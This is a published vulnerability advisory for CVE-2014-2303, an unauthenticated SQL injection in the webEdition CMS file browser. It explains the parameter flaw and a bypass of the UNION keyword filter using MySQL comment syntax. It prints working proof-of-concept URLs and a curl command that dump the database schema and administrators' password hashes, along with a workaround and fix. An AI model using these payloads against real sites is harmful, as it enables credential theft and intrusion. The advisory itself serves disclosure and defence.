webEdition CMS 6.3.8.0 svn6985 SQL Injection

`Advisory: SQL Injection in webEdition CMS File Browser  
  
RedTeam Pentesting discovered an SQL injection vulnerability in the file  
browser component of webEdition CMS during a penetration test.  
Unauthenticated attackers can get read-only access on the SQL database  
used by webEdition and read for example password hashes used by  
administrative accounts.  
  
  
Details  
=======  
  
Product: webEdition CMS  
Affected Versions: webEdition 6.3.8.0 svn6985 down to 6.3.3.0,  
probably earlier versions, too  
Fixed Versions: 6.2.7-s1 - 6.3.8-s1  
Vulnerability Type: SQL Injection  
Security Risk: high  
Vendor URL: http://www.webedition.org  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005  
Advisory Status: published  
CVE: CVE-2014-2303  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303  
  
  
Introduction  
============  
  
"webEdition is a flexible CMS for companies of every size. It offers a  
great amount of functionality and can be flexibly customized for  
individual needs. It is ideally suited for users who want to operate  
their web-site comfortably. Even the creation of custom web-applications  
is easily possible with webEdition."  
  
(translated from webEdition homepage)  
  
  
More Details  
============  
  
The webEdition CMS contains a file browser component that allows  
browsing parts of the website's filesystem structure. It is usually  
reachable under the following URL:  
  
http://www.example.com/webEdition/we_fs.php  
  
When browsing to individual directories, HTTP GET requests such as the  
following are sent to the web server:  
  
GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20  
DESC,%20Text&filter= HTTP/1.1  
Host: www.example.com  
[...]  
  
The server responds with JavaScript code that updates the directory  
listing:  
  
<script>  
top.clearEntries();  
top.addEntry(13,"folder.gif","careers",1,"/en/careers");  
top.addEntry(14,"folder.gif","company",1,"/en/company");  
top.addEntry(15,"folder.gif","contact",1,"/en/contact");  
top.addEntry(20,"we_dokument.gif","index.php",0,"/en/index.php");  
top.writeBody(top.fsbody.document);  
[...]  
</script>  
  
The requests which are sent to retrieve this information contain two  
interesting parameters: "table" with a value of "tblFile" which appears  
to name a database table, and the parameter "order" with a value of  
"IsFolder DESC, Text", which contains parts of an SQL ORDER BY clause.  
In combination, these two parameters can be used to perform SQL  
injection attacks. It appears that they are embedded into an SQL query  
in a similar manner as follows:  
  
SELECT ID,ParentID,Text,Path,IsFolder,Icon  
FROM tblFile  
WHERE [...]  
ORDER BY IsFolder DESC, Text  
  
Using a "table" parameter value of "tblFile WHERE 1=1 /*" and an "order"  
parameter value of "*/", will result in a query similar to the  
following:  
  
SELECT ID,ParentID,Text,Path,IsFolder,Icon  
FROM tblFile WHERE 1=1 /*  
WHERE [...]  
ORDER BY */  
  
The queries executed by the CMS retrieve six columns, which can be seen  
in the application's source code, or by injecting ORDER BY clauses with  
numeric column indexes into the query. Knowing the number of columns in  
a query, it is typically possible to use the UNION operator to obtain  
additional information, for example from other tables. As a security  
measure, webEdition implements filtering of the UNION keyword.  
  
The web application checks whether the text "UNION" is part of  
user-supplied information that is entered into database queries and then  
blocks such queries. This behaviour is implemented in the file  
  
/webEdition/we/include/we_classes/database/we_database_base.class.php  
using the function  
preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings)  
  
The CMS first checks whether the text "UNION" appears in the query  
string in any combination of upper- and lowercase characters. If that is  
the case, a regular expression is used to determine whether the word  
"UNION" appears in any context that is deemed dangerous by the  
application developers. However, the underlying MySQL database system  
supports embedding MySQL-specific query code within comments that  
contain an exclamation mark ("!")  
(see https://dev.mysql.com/doc/refman/5.5/en/comments.html).  
  
For example, a query like  
  
SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */  
  
will yield no results on other database systems, but will return all  
rows on MySQL. Likewise, the text "/*!UNION*/", which is not caught by  
the aforementioned regular expression, can be used instead of just  
"UNION" on MySQL, thus enabling injections that use the UNION operator:  
  
$ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\  
'&table=tblFile+WHERE+1=0+/*!UNION*/+SELECT+1,2,3,4,5,6/*&order=*/'  
<script>  
top.clearEntries();  
top.addEntry(1,"6","3",5,"4");  
[...]  
  
  
Proof of Concept  
================  
  
The following URL lists the configured tables and their columns from the  
webEdition database:  
  
http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+  
1=0+/*!UNION*/+SELECT+1,2,TABLE_NAME,4,COLUMN_NAME,TABLE_SCHEMA+  
FROM+INFORMATION_SCHEMA.COLUMNS/*&order=*/  
  
The following URL retrieves configured users and hashed passwords from  
the webEdition database:  
  
http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+  
1=0+/*!UNION*/+SELECT+1,2,passwd,4,5,username+FROM+tblUser/*&order=*/  
  
  
Workaround  
==========  
  
Disable the file browser component of webEdition, for example by  
deleting we_fs.php.  
  
  
Fix  
===  
  
Update to a version with the suffix -s1. Those versions are available as  
updates for releases between 6.2.7 and 6.3.8. The newest, updated  
version would therefore be 6.3.8-s1.  
  
Note that the version check of webEdition might tell you that there is  
no update available and that you are running Version "6.3.8 (6.3.8.0  
Release, SVN-Revision 6985). It will still tell you that the newest  
available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so  
you can use the "Update-Repetition" function to get the fix for this  
vulnerability.  
  
  
Security Risk  
=============  
  
Attackers can exploit this SQL injection vulnerability to read contents  
of the webEdition database. This database contains, among published and  
potentially unpublished content of the CMS, the credentials of the  
administrative users of the CMS. If an attacker manages to find a  
password for a password hash extracted using this SQL injection  
vulnerability, the attacker could use these credentials to gain  
administrative privileges in the CMS. This poses a high risk.  
  
  
Timeline  
========  
  
2014-02-20 Vulnerability identified  
2014-03-04 Customer approved disclosure to vendor  
2014-03-06 CVE number requested and assigned  
2014-03-07 Vendor notified  
2014-03-10 Vendor acknowledges vulnerability  
2014-05-20 Vendor announces fixed versions  
2014-05-28 Advisory released  
  
  
References  
==========  
  
http://www.webedition.org/de/aktuelles/webedition-cms/  
Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht  
(German)  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`